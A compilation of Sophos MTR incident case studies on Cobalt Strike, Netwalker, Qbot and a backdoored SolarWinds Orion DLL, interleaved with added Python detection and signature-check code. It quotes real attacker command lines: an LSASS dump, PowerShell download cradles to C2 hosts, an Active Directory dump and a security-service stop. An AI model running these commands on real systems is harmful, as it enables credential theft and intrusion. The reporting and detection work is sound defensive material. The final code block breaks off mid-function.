The first thing an adversary will look to do is to move laterally, to another host, and install a reverse shell – a way to have that host call back to them and give them command line access. Using the command line is a far more stealthy method of remote access, allowing them to hide in the background even while a user is logged in and using the host.

As to what the adversary’s goals were, these are unknown. The MTR operators identified the attacker long before they were able to act on their objectives, catching them while they were still in the network propagation stage, moving laterally and attempting to escalate their privileges.

Following the investigation, the MTR operators continued to monitor the customer’s estate for this specific threat for seven more days, identifying no further malicious or suspicious activity.

The MTR team then concluded that the adversary had been successfully ejected from the network.

Case closed. On to the next.

Learn more

For more information on the Sophos MTR service, speak with the security experts at Spear Shield.

If you prefer to conduct your own threat hunts, Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Speak with the Spear Shield team if you'd like to start a 30-day no obligation trial today.


Indicators of compromise

ProcDump of LSASS: C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"
Meterpreter GetSystem: C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7
C2 IPv4:
C2 payload URL:
C2 port (Cobalt Strike): 50050
PowerShell to download and invoke Cobalt Strike payload: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

Installing MTR on the run to keep up with Netwalker

A new customer of the Sophos Managed Threat Response (MTR) service delayed their deployment, so when they were unexpectedly hit by a Netwalker ransomware attack, they had to go into SOS mode. Even though Sophos MTR immediately stepped in to neutralize the incident, the investigation into the initial entry points of the attack was hindered by a lack of historical evidence.

Key takeaways:

  • Attackers move fast and visibility is crucial to a swift response. Deploying a managed threat hunting and response service such as MTR quickly after procurement is critical to ensure protection is activated and there are no visibility gaps.
  • Attackers leave traces and trails, and MTR uses both to neutralize and mitigate an active attack and to investigate what security gaps were exploited, in order to help prevent future attacks. Having MTR in place from the start means this evidence can all be collected.
  • Proper deployment of MTR is vital – partners have an important role to play alongside Sophos in helping organizations to do this.

A tough lesson

At 5 a.m. one morning in January 2021, the 24/7 Sophos MTR team received a call from a worried customer who had recently signed up to the service but had not yet been able to activate the licenses. The customer wanted to know the fastest way to deploy MTR because there was an active ransomware attack underway and the organization’s DNS and email were down.

Under normal circumstances, MTR would respond to alerts from Sophos technologies and catch attacks as they begin. Organizations under active attack who are not Sophos or MTR customers would be routed to the Sophos Rapid Response team to stop the attack. In this instance, the customer was targeted by attackers before it deployed its newly acquired Sophos MTR service, so there was no MTR monitoring of its servers and endpoints.

After receiving the call, Sophos MTR quickly jumped in to neutralize the active attack. The team worked with the customer to identify and isolate the domain controller being used by the adversaries to launch the attack and limited its access on the network.

The MTR incident lead handling the response then advised the organization to reset all domain admin accounts and block discovered adversary command and control (C2) addresses. Once that was done, the organization quickly deployed MTR across nearly 200 servers and endpoints. This helped to secure the organization from further impact while the MTR team continued its work to identify and block the attack and assess what was done by the intruders.

Some of the systems had Sophos Intercept X Endpoint security installed, so these were protected from the attack. Intercept X’s CryptoGuard technology protects against ransomware attacks, regardless of the ransomware family, by detecting when files are being encrypted and blocking the malicious activity.

The attackers were, however, able to hit unprotected machines with ransomware.

Sophos’ MTR team initially thought the ransomware might be Conti, because one of the C2 addresses found used the “Trevor Forget” profile of DerbyCon lore, also seen in a recent Conti attack. (In that profile a static URI mimics the name of the restaurant where one of the security researchers attending DerbyCon found a dead cockroach in his drink, which he named Trevor.)


However, this turned out not to be the case. After finding the following command, Sophos MTR was able to locate the ransomware itself:

cmd" /c "(net use b: /delete /y & net use b: \\REDACTED\111 /user:REDACTED\Administrator REDACTED & powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -File b:\pss.ps1)

The attacker had started by deleting anything that might be mounted at b:\, before mounting a directory from a remote machine using the domain administrator account to do so. Lastly, it ran a PowerShell script dropped into that directory earlier, to grab pss.ps1, the ransomware file.

Also, on the first day of the investigation, MTR identified the command used to download Cobalt Strike prior to the ransomware attack:

cmd.exe /c powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https[:]//dennycartos[.]online:443/aooor'

The MTR team passed this information to SophosLabs experts, who quickly identified the attack as Netwalker ransomware and created a detection to block the Cobalt Strike download domain for all Sophos customers.

Within three hours of MTR jumping on this incident, Sophos shut down all malicious activity and told the organization it was safe to roll to production again. The unprotected devices that had been encrypted were rebuilt from the organization’s backups.

Additional discoveries

Although MTR wasn’t installed in the early stages of the attack, the team was able to construct some understanding of the events leading up to the attack. Their investigation turned up some of the tools the attackers used, including Angry IP Scanner, which is used by adversaries to map devices on a target network, and Bloodhound, a tool designed to help IT pros discover common Active Directory security issues. The attackers also used Bloodhound to find domain admin accounts by mapping out user trust in Active Directory.

There were also suspicious logins in early January from Russia, Germany, Sweden, and the United States, as well as detections from December for malicious DLLs and software. MTR was unable to recover any of these files and so it is impossible to tell if they belonged to the same adversaries as the ones behind the ransomware attack.

Lastly, Sophos MTR noticed the attackers tried and failed to disable Sophos security on devices using a Windows Management Instrumentation command:

wmic service where "name like 'sophos%%'" call servicestop

The attackers actually attempted to disable Sophos in this way more than once but were unsuccessful for two reasons. First, the tamper protection in Intercept X monitors and defends Sophos endpoint agents from being disabled, even if the attacker is running as system administrator. Secondly, the attacker had a typo in the command: it should be stopservice not servicestop, so the command wouldn’t have worked anyway.
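Detection logic for the command-line artefacts in these two case studies (the ProcDump-of-LSASS, GetSystem named-pipe and download-cradle indicators from the first story, and the WMIC service-stop attempt just described), as an added example that is not part of the Sophos articles. It runs a few regex rules over constructed process-creation events; the hostnames and rule names are assumptions, and the ATT&CK technique IDs are the standard ones for each behaviour.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str          # endpoint the process ran on (constructed names)
    command_line: str  # full command line as recorded by the endpoint agent


# Constructed process-creation events. The first four command lines are the
# ones quoted in the two case studies (redactions kept as the articles give
# them); the last two are benign controls that no rule should fire on.
SAMPLE_EVENTS = [
    ProcessEvent("host-a", r'C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"'),
    ProcessEvent("host-a", r"C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7"),
    ProcessEvent("vpc-web-01", r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"'''),
    ProcessEvent("dc-01", r"""wmic service where "name like 'sophos%%'" call servicestop"""),
    ProcessEvent("host-b", r"wmic useraccount get /ALL /format:csv"),
    ProcessEvent("host-b", r"C:\Windows\system32\cmd.exe /c echo build ok > C:\logs\build.txt"),
]

# (rule name, ATT&CK technique, pattern over the command line). Patterns are
# loose about casing, spacing and quoting so trivial rewrites do not evade them.
RULES = [
    ("procdump-of-lsass", "T1003.001",
     re.compile(r"procdump.*\s-ma\s+lsass\b|lsass\.dmp", re.I)),
    ("remote-wmic-process-create", "T1047",
     re.compile(r"\bwmic\b.*\s/node:.*\bprocess\s+call\s+create\b", re.I)),
    # the GetSystem named-pipe artefact: cmd.exe echoing a hex token into \\.\pipe\<hex>
    ("meterpreter-getsystem-named-pipe", "T1134.001",
     re.compile(r"\becho\s+[0-9a-f]+\s*>\s*\\\\\.\\pipe\\[0-9a-f]+", re.I)),
    # a WebClient download cradle, whether it lands in IEX (in memory) or in a file
    ("powershell-webclient-download", "T1059.001",
     re.compile(r"new-object\s+(system\.)?net\.webclient\)\.download(string|file)\(", re.I)),
    # "-w hidden" and any longer prefix of -WindowStyle hidden
    ("powershell-hidden-window", "T1564.003",
     re.compile(r"\s-w\S*\s+hidden\b", re.I)),
    # match the misspelt verb too: the intent (stopping the security service) is the same
    ("wmic-stop-security-service", "T1562.001",
     re.compile(r"\bwmic\s+service\s+where\b.*\bcall\s+(stopservice|servicestop)\b", re.I)),
]


def evaluate(event):
    """Names of every rule whose pattern matches this event's command line."""
    return [name for name, _technique, pattern in RULES
            if pattern.search(event.command_line)]


def triage(events):
    """Group matching events by rule so an analyst sees which artefacts co-occur:
    an LSASS dump, a GetSystem pipe and a download cradle on the same estate are
    one intrusion, not three unrelated alerts."""
    hits = {}
    for event in events:
        for rule in evaluate(event):
            hits.setdefault(rule, []).append(event)
    return hits


if __name__ == "__main__":
    for rule, events in triage(SAMPLE_EVENTS).items():
        technique = next(t for n, t, _ in RULES if n == rule)
        for event in events:
            print(f"[{rule} / {technique}] {event.host}: {event.command_line}")
```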

A strange coda

A few weeks after the Netwalker ransomware attack was discovered and neutralized by the MTR team, the US Department of Justice (DoJ) took its own steps to disrupt Netwalker. On Jan. 27, 2021, the DoJ announced it was bringing charges against a Canadian national believed to be part of the Netwalker group. The announcement went on to note that on Jan. 10, 2021, DoJ seized more than $400,000 in cryptocurrency paid as ransom in three Netwalker attacks. Lastly, authorities in Bulgaria seized a dark web site used by Netwalker affiliates to provide payment instructions and communicate with victims.

As yet, it is unclear how these DoJ actions will impact Netwalker given that it is a ransomware-as-a-service product licensed by malicious actors from a main group. What is clear is the threat of ransomware is always looming and can strike at any time.

SophosLabs has published a list of indicators of compromise for the samples used in its analysis of Netwalker on its GitHub page.

Netwalker threat actor toolset on the ATT&CK matrix

The ransomware hunt that unearthed a historic banking trojan

A real-world story from the Sophos Managed Threat Response team

Customer profile: A non-profit organization based in the USA, with approximately 1,000 devices.

The Sophos Managed Threat Response (MTR) team provides customers with swift, human-led responses to the nastiest threats and most sophisticated adversaries.

The hunt begins

Sophos Audio on SoundCloud. Click to hear more from Greg Iddon about this story.

This case started with an email from a brand-new MTR customer. The customer had just heard that a third-party vendor they work with had been hit by ransomware and was worried they might also be affected.

The MTR team immediately picked up their request, opened a new case, and initiated a threat hunt. Within 15 minutes they were highly confident that there was no ransomware in the customer’s environment.

But the team did find something suspicious. Very recently, a script had been detected and blocked by the customer’s Sophos endpoint protection software.

What was odd was that it was in JavaScript, which is typically used by websites to make them interactive. However, this detection wasn’t coming from a web browser – it was coming from the command line.

And it was obfuscated: someone didn’t want it to be read by human eyes.

Diving deeper

We sent the script to SophosLabs, our threat research and intelligence team, to get a deeper analysis of this script and what it was trying to do. Within minutes, SophosLabs began sharing actionable intelligence:

  • The script was a downloader. It would have tried to download a malicious payload hosted at a URL. A search across network traffic data revealed the URL was never contacted.
  • The downloader script would have attempted to make a scheduled task.

While we couldn’t find any evidence of this task being created, we did find another suspicious-looking scheduled task that would run a different script.

This new script would attempt to find two files with the file extension .zzz and join them together into a .exe. It would then run this .exe, delete the scheduled task, delete the .zzz files, and finally delete the script.

This scheduled task was waiting to do its job but the files it was waiting for never appeared.

Situation resolved

The picture was clear. The suspect scripts and tasks belonged to a variant of a banking trojan and information stealer known as Qbot, and it had been running undetected on a device in the customer’s network for a very long time.

The criminals behind Qbot were trying to orchestrate the download of an update as two .zzz files in order to evade perimeter defenses, and then join them together once on the inside.

Unlucky for Qbot, we caught this process in the act.

As the customer had authorized Sophos to respond on their behalf, we cleaned up the Qbot infection, and informed the customer of what we had discovered.

The whole investigation, from the initial customer email to final clean up, took just 2 hours 6 minutes.

The customer was able to relax knowing that they hadn’t been affected by ransomware and that a historic banking malware had been fully removed.

And as this story shows, while ransomware is often the threat that is front of mind, it’s important to also be alert to the attacks that prefer to hide in the shadows.

Learn more

For more information on the Sophos MTR service, speak with one of the security experts at Spear Shield today.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Speak with the team at Spear Shield to start a 30-day no obligation trial today.

Uncovering a backdoor implant in a SolarWinds Orion server

A real-world story from the Sophos Managed Threat Response team

Please note: Although elements of this story may seem connected to the recent SolarWinds Sunburst attack, we have not found any concrete evidence that these two incidents are related.

Customer profile: An internet service provider and telecommunications organization based in the USA with approximately 1700 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service. Sophos Rapid Response provides emergency remote incident response for active incidents.

Setting the scene

The organization in question came to Sophos Rapid Response after falling victim to a Ragnar Locker attack in early 2020. A ransomware payload was delivered manually by a highly capable group at around 2 a.m., while admins were asleep, hitting as many computers as they could in quick succession.

They hit hundreds.

Sophos Rapid Response was brought in to help identify, contain and neutralize the threat. It took the team less than two days to resolve the active threat and over the following days incident responders were able to ascertain the threat actor had entered the network two months prior to the ransomware attack.

With the Ragnar group removed from their network, the customer transitioned to the full MTR service in Notify mode with our security operations team watching over them 24/7.

While the pressing threat of Ragnar Locker was out of the picture, in November 2020 another threat actor stepped into view…

Sneaking over WMI

Increasingly, threat actors like to pack light when on a mission. They don’t bring their own tools and prefer to “live off the land.” They take advantage of capabilities built into operating systems, like Microsoft Windows, to evade detection.

Windows Management Instrumentation, or WMI for short, is a feature that enables remote management and automation of administrative tasks. It’s designed to ease the pains of managing large enterprise environments with an overwhelming number of computers.

But in the hands of a threat actor, WMI offers quite the rich toolbox to achieve a number of wide-ranging goals. And with WMIC, the command line interface for WMI, adversaries can write simple yet powerful one-line instructions.

For example, running Notepad on a remote computer:

wmic /user:"username" /password:"password" /node:"" process call create "notepad.exe"

Or listing all the local user accounts on a computer:

wmic useraccount get /ALL /format:csv

Hunting for abuse of WMI is essential, but discerning the difference between legitimate use of WMI and malicious use is no easy task, often requiring a keen eye towards the context of the commands. What commands came before? What commands came after? What is the intent?

These are the questions our MTR operators ask themselves as a number of suspicious-looking WMI commands are identified in the customer’s network, all taking place in quick succession, during a routine threat hunt alongside researchers from SophosLabs.

Hunting for threat actors

The threat hunters see the first red flag. WMIC was used to instruct remote computers to launch commands. This alone is suspicious, but where did the commands come from?

Looking at the hierarchy, wmic.exe was executed by cmd.exe, the Windows Command Prompt. And cmd.exe was executed by w3wp.exe, a worker process for Microsoft IIS – a web server.

A web server. Surely no measured admin would launch administrative commands to other servers from their own web server?

And what is going on in this command seen on the web server?

wmic /node: /user:"REDACTED" /password:"REDACTED" process call create "c:\Windows\Temp\backup.bat"

WMIC calls out to a remote computer, authenticated with credentials, to create a new process and execute a script called backup.bat. On its own, it’s not terribly suspicious. But given that this was initiated by a web server worker process, we need to dig deeper. What is backup.bat?

MTR finds another troubling command.

cmd /c "powershell (new-object system.net.webclient).downloadfile('http://98[.]225.248.37:8090/update','c:\users\public\update')"&exit

Combined with the context of the previous command, it is clearly suspicious to see PowerShell (another Microsoft task automation and configuration management tool) creating a webclient to “downloadfile” from an unknown host, a file called “update”.

Before continuing, an MTR operator sends the first notification to the customer and engages their admin team.

The operator shares the observed WMIC commands as well as the servers and users associated with the commands, with guidance to reset those user passwords and to use Sophos Intercept X to isolate the servers from the rest of the network. Additionally, that strange IP address needs blocking on their firewall.

On with the investigation.

Looking back in time to the preceding commands, the picture becomes clearer.

cmd /c "echo mkdir c:\windows\temp\tmp > \\\c$\Windows\Temp\backup.bat" 
cmd /c "echo ntdsutil "ac i ntds" ifm "create full C:\Windows\Temp\tmp" q q >> \\\c$\Windows\Temp\backup.bat"

That’s no backup command. A .bat file is a Batch script, the classic way of bundling Windows commands together rather than running each by hand.

Echo typically prints a line of text to the screen (i.e. the command terminal); however, the > symbol is a redirect. Instead of writing the text mkdir … to the terminal, it writes it to a file on a remote system.

The threat actor built a script on a remote computer. And they had run it.

First it creates a new “tmp” folder in the Windows temporary directory (where things are put when it doesn’t matter if they disappear later on). Next it uses ntdsutil.exe

To a veteran threat hunter, the threat actor’s goal is clear.

Credential access to elevate privileges

Ntdsutil is short for NT Directory Services Utility. It is a tool for interacting with Active Directory servers, Microsoft’s centralized suite of technologies responsible for authenticating and authorizing users and computers in a Windows domain.

The arguments "ac i ntds" ifm "create full …" tell ntdsutil to write a full dump (a copy) of the entire Active Directory database, a capability intended for the legitimate purpose of deploying a domain controller using the “install from media” option.

This actor tried to get their hands on credentials, and that variant of the command is often used by threat actors who have access to the domain controller but don’t yet have domain admin credentials.

They tried to elevate privileges. And they were caught red-handed.

An operator gets back in touch with the customer to fill them in with the latest discoveries. The customer initiates domain-wide password resets. Better to be safe than sorry.

With the malicious IP blocked, all passwords reset, and those servers isolated, the threat actor is dead in the water.

But it is still a mystery how they orchestrated these commands. Where is the initial point of entry?

What did they do on that webserver?

Web shells

Public webservers are inherently risky. Not only do they face the internet, making them a prime target for an adversary’s initial intrusion into an organization’s network, but it is also normal for them to communicate with a wide range of IP addresses never seen before.

All that web traffic, all that noise, makes web servers a wonderful place to hide and launch commands. Only a keen eye will spot that needle amongst the hay. Especially if you’re only looking at network traffic.

Thankfully, MTR collects endpoint telemetry as well as network telemetry, providing rich data to contextualize anything that might be found.

Looking over all the commands the threat actor ran on the server, a pattern emerges.

cmd /c "copy \\\c$\windows\temp\tmp\big.fm f:\sites\REDACTED\big.fm"

This command called out to a remote server to copy a file called big.fm from the tmp directory we saw earlier. Sadly, “Big FM” is not the name of the threat actor’s favorite Top 40 radio station, it’s what the threat actor named the Active Directory database dump.

What sticks out in this command, and many others they ran, is they only copied files to a particular folder on the webserver inside f:\sites\. Almost as if this was the only folder they had permissions to access. A folder where the website code resides.

This smells like a web shell.

Looking inside f:\sites\ our MTR operator finds a lonely looking file called about.aspx. Active Server Page Extended (ASPX) is a framework for writing dynamic websites. Taking a look over the code, our operator observes that the web page will receive encoded web requests and send the decoded request to cmd.exe, the Windows command prompt.

This is a web shell.

But why wasn’t it detected earlier?

Grabbing a copy of the file, MTR sends this immediately to SophosLabs for deeper analysis. Even as the file passes through our automated analysis systems, it’s clear this web shell variant has never been seen before. SophosLabs researchers quickly tear it apart and publish detections for this new variant, protecting all our customers around the globe from this web shell should it be used again.

At the time of writing this article we are the only vendor with a detection published for this web shell variant (detected as Troj/WebShel-H). The file hash is in the IOCs table at the bottom of this article.

With the web shell neutralized (hopefully along with the threat actor’s access), our operators move their focus to answering several important questions: Where did this web shell come from? What else was it used for? And what was the file update that the threat actor downloaded?


Scouring historic telemetry gathered by MTR since the service’s technology was deployed shows no signs of when the web shell was installed. Plenty of file accesses and timestamp modifications are observed, but it’s clear the web shell was deployed before Rapid Response had been engaged and our telemetry collection began.

This is a dead end.

Looking at the events that preceded the download of the file update proves more fruitful, albeit concerning: they include another request to a different C2, http://216[.]243.39.167:8090/, to fetch another version of the file.

The following command is observed:

cmd /c "copy \\\c$\inetpub\SolarWinds\orion\update \\\c$\inetpub\SolarWinds\bin\OrionWeb.dll /y"

Whatever the update file is, it has been used to replace a component of SolarWinds Orion called OrionWeb.dll.

Time to investigate this DLL.

DLLs are dynamic-link libraries, bundles of executable code that are called upon by applications, implementing various features and capabilities of an application. One can’t simply swap out a DLL with something completely different without causing an application to crash or throw lots of errors.

This needs expert eyes to investigate. MTR shares a sample with SophosLabs for reverse engineering and analysis.

This sample is not cryptographically signed, which is odd for a DLL purporting to be from a reputable vendor.

Digital signatures are a vital part of the trust model for Microsoft Windows. Using strong cryptography, a signature lets both the authenticity of a file be verified, confirming it is from who it says it is from, and its integrity, confirming it has not been modified or corrupted in some way.

If someone were to modify this DLL, the digital signature would no longer validate the file integrity. But if the signature is entirely removed, there’s nothing to use to validate the file integrity at all.

MTR compares the file to a known-good copy of OrionWeb.dll and it is clear this file was and should be signed. Who removed the signature? And why?
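A first-pass check for the observation above (a vendor DLL that should carry an Authenticode signature but does not), written as an added example that is not from the article or from Sophos: it reads the PE optional header's security data directory, which is where the signature table lives, and reports whether one is present. build_minimal_pe constructs a header-only image so the check can be exercised offline; the function names are assumptions.

```python
import struct
import sys

IMAGE_DIRECTORY_ENTRY_SECURITY = 4       # data-directory slot holding the Authenticode table
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002  # WIN_CERTIFICATE.wCertificateType for Authenticode


def authenticode_entry(pe):
    """(file offset, size) of the embedded signature table, or None if the image
    carries no signature. Presence only: whether the signature actually verifies
    and chains to the expected publisher is a separate step (signtool verify or
    Get-AuthenticodeSignature on Windows)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image: no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: no PE signature")
    coff = e_lfanew + 4
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:        # PE32: data directories start at optional-header offset 96
        count_off, dirs_off = 92, 96
    elif magic == 0x20B:      # PE32+: they start at 112
        count_off, dirs_off = 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs = struct.unpack_from("<I", pe, opt + count_off)[0]
    entry = dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY or entry + 8 > opt_size:
        return None
    # Unlike every other directory, the security entry holds a raw file offset, not an RVA.
    offset, size = struct.unpack_from("<II", pe, opt + entry)
    return (offset, size) if offset and size else None


def signature_status(pe):
    """'unsigned', 'corrupt' or 'signed (unverified)'. A vendor DLL that should be
    signed and reports 'unsigned' is the observation the case study turns on."""
    entry = authenticode_entry(pe)
    if entry is None:
        return "unsigned"
    offset, size = entry
    if size < 8 or offset + size > len(pe):
        return "corrupt"
    length, _revision, cert_type = struct.unpack_from("<IHH", pe, offset)
    if cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA or length > size:
        return "corrupt"
    return "signed (unverified)"


def build_minimal_pe(pkcs7=None):
    """Constructed, header-only PE32+ image for exercising the parser offline;
    pkcs7 is an opaque stand-in for a real signature blob."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)            # e_lfanew = 64
    n_dirs = 16
    opt_size = 112 + 8 * n_dirs
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, opt_size, 0x2022)
    header_len = len(dos) + 4 + len(coff) + opt_size
    dirs = [(0, 0)] * n_dirs
    table = b""
    if pkcs7 is not None:
        table = struct.pack("<IHH", 8 + len(pkcs7), 0x0200,
                            WIN_CERT_TYPE_PKCS_SIGNED_DATA) + pkcs7
        table += b"\0" * (-len(table) % 8)                     # entries are 8-byte aligned
        dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (header_len, len(table))
    opt = struct.pack("<H", 0x20B) + b"\0" * 106 + struct.pack("<I", n_dirs)
    opt += b"".join(struct.pack("<II", off, sz) for off, sz in dirs)
    return dos + b"PE\0\0" + coff + opt + table


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(f"{path}: {signature_status(fh.read())}")
```

Presence is not validity: a file that reports a signature table still needs cryptographic verification against the expected publisher, which this parser does not attempt.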

OrionWeb.dll is a .NET assembly, written in C# (pronounced “C sharp”). C# is a Microsoft programming language that can easily take advantage of the capabilities of the .NET (“dotNET”) framework, and .NET is Microsoft’s powerful framework for writing applications for their platforms and interfacing with various Microsoft technologies.

One of the benefits of .NET assemblies is that they can be debugged and modified far easier than traditional compiled executables. One can open them up in a variety of tools like dnSpy and read and change the code they contain.

SophosLabs fully decompile the suspicious DLL and compare it to a known-good sample using the popular diff application WinMerge, a tool that enables file comparison and highlights the differences between them.

But as SophosLabs begin to dig into what had been changed, the changes seem incredibly minor. For instance, where the declaration of the LdapAuthentication class previously listed the interfaces ILdapAuthentication and IDisposable in that order, the order was reversed in the suspicious sample.

Reviewing many of the other classes of code in the files, this same pattern of change is observed – parameters swapped around for no obvious reason. Anyone quick to run their eye over these changes would rightfully assume that the software developer has just refactored (i.e. reorganized) their code and nothing suspicious or malicious is present.

Yet given the context of how this file was discovered, SophosLabs and our operators push on with analyzing the sample to try and discover why this different DLL is so important to them that they needed to replace the original with it.

Eventually a discovery is made in the ValidateUser function (in SolarWinds.Orion.Web.OrionMembershipProvider). A chunk of code has been inserted. And it completely changes the behavior of the function.

This SolarWinds Orion server was backdoored!

A Hidden Backdoor

The original ValidateUser function was quite simple – it would be called with a username and password and then, behind the scenes, it would call another function called InternalValidateUser that would do the heavy lifting of authenticating the user.

However, the actor behind this threat added a lot of extra logic to the ValidateUser function.

First, a try/catch pattern was inserted on lines 5 and 54 with the catch block empty. This pattern ensures that any errors that may occur in the try block are suppressed and don’t cause the whole application to crash or print out errors that may reveal something is awry.

Next, a StreamWriter was added on line 7 which would write text to a seemingly randomly named file in the C:\Users\Default\AppData\Local\Temp\ directory. Any provided username and password would be written to the file, encrypted with a simple binary XOR and Addition cipher with hard coded keys.

The adversary wanted to continuously capture a stream of valid usernames and passwords for SolarWinds Orion.

After that, a conditional if statement was inserted on line 21 which looked for when the provided username is _system. A username that did not exist in the application’s database. A username only the adversary would know about.

Within the if statement were several instructions to access the application’s SQL database and delete the audit logs that would have revealed any usage of this _system username. The threat actor clearly had knowledge of how OrionWeb functions and how best to cover their tracks.

A text string was then constructed on lines 57 and 58 from the number of days since the epoch (a fixed reference point in time from which the current date/time is counted, in this case January 1st 1970). Around that day count, 80CD1DB_ and _0F90D2 are added, e.g. 80CD1DB_42745_0F90D2.

But why would a dynamic text string be needed, one that changes every single day? The answer soon becomes clear.

The final modification was in the return statement on line 59.

The original statement would call the InternalValidateUser function. Inferring from the changes, this function would either return True or False (for either a successful or unsuccessful authentication). Yet the adversary had added two additional ways for the ValidateUser function to return True. If the password is this dynamic text string, or if the username is “_system” and the password is also the dynamic text string.

The adversary implanted a custom, dynamic password and username that only they would know about and ensured their usage of these credentials would never end up in the SolarWinds Orion audit logs.

And then another malicious injection is found.

Lurking in the GetLdapIdentity function (in SolarWinds.Orion.Web.OrionMixedModeAuth), SophosLabs discover the following code:

Similar to the StreamWriter observed above, the functionality intercepts credentials as they are being used by the application and encrypts and writes them to another seemingly randomly named file. But this time the adversary is stealing LDAP, Lightweight Directory Access Protocol, credentials which are used for authenticating with directory services like Microsoft Active Directory.

The adversary wanted to continuously capture a stream of valid usernames and passwords for the customer’s domain, not just for SolarWinds Orion.

Thankfully, the affected hosts are already isolated. MTR confirms with the customer that these hosts are taken offline and are rebuilt to ensure no backdoor remains in their network.

The Big Picture

The sequence of events is now clear:

  • The threat actor gained access to the web server and installed a web shell to send commands and orchestrate the rest of the attack
  • A backdoored version of OrionWeb.dll was downloaded from their C2 server. Additional logic was added to authenticate the username “_system” with a dynamic password that would change every day and the digital signature of the file removed.
  • OrionWeb.dll was replaced with their backdoored version.
  • Discovery was performed and domain controllers accessed to create a full dump of Active Directory to use for privilege escalation or to exfiltrate.

Given the recent supply chain attack on SolarWinds, this attack is certainly of note. However, we could not identify concrete evidence that the two are connected. The C2s, web shell, and DLL used in this attack are not ones we have observed before, outside of this single incident, nor have we observed them used since.

This style of attack is not specific to SolarWinds Orion and does not rely upon the exploitation of a vulnerability in its code. A threat actor can reverse engineer and maliciously modify a .NET assembly using freely available tools with no requirement for source code access.

The threat actor behind this attack is clearly highly skilled and capable. Their playbook of identifying viable .NET assemblies to backdoor underlines the importance of threat hunting, as well as application allowlisting and file integrity monitoring (both available in Sophos Intercept X Advanced for Server).
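The casebook notes that the backdoored DLL had its digital signature stripped and recommends file integrity monitoring. As an added example (not Sophos's or SolarWinds' code), the Python below hashes a .NET assembly against a known-good allowlist and inspects the PE header for the Authenticode directory; the allowlist entry is a placeholder and the PE images it checks are constructed in memory.

```python
"""Added example: file-integrity check for a .NET assembly such as OrionWeb.dll.
Hashes the file, compares against a known-good allowlist, and reads the PE
data directories to see whether the Authenticode blob is still present and
whether the file is a managed (.NET) assembly. Allowlist and sample PE images
are constructed placeholders."""
import hashlib
import struct

# Placeholder: populate from install media or a vendor-published hash.
KNOWN_GOOD_SHA256 = {
    "<sha256 of the known-good OrionWeb.dll goes here>",
}


def parse_pe_directories(data: bytes) -> dict:
    """Report Authenticode-blob presence and CLR header presence.

    Presence only: this does not verify the signature cryptographically,
    so pair it with signtool or Get-AuthenticodeSignature.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER
    opt = coff + 20                           # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                        # PE32+
        dd_off = 112
    elif magic == 0x10B:                      # PE32
        dd_off = 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs = struct.unpack_from("<I", data, opt + dd_off - 4)[0]

    def directory(index: int) -> tuple:
        if index >= n_dirs:
            return (0, 0)
        return struct.unpack_from("<II", data, opt + dd_off + index * 8)

    _, security_size = directory(4)           # IMAGE_DIRECTORY_ENTRY_SECURITY
    _, clr_size = directory(14)               # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    return {"authenticode_present": security_size > 0,
            "managed_assembly": clr_size > 0}


def assess_assembly(data: bytes, allowlist=KNOWN_GOOD_SHA256) -> dict:
    """Combine hash allowlisting with the header check into one verdict."""
    info = parse_pe_directories(data)
    info["sha256"] = hashlib.sha256(data).hexdigest()
    info["in_allowlist"] = info["sha256"] in allowlist
    # A managed assembly that lost its signature or drifted from the
    # known-good hash is the pattern described in this casebook.
    info["suspicious"] = info["managed_assembly"] and (
        not info["authenticode_present"] or not info["in_allowlist"])
    return info


def build_sample_pe(security_size: int, pe32plus: bool = True) -> bytes:
    """Constructed header-only PE image so the check can run offline."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)               # e_lfanew
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                       0, 0, 0, 0, opt_size, 0x2022)
    opt = bytearray(opt_size)
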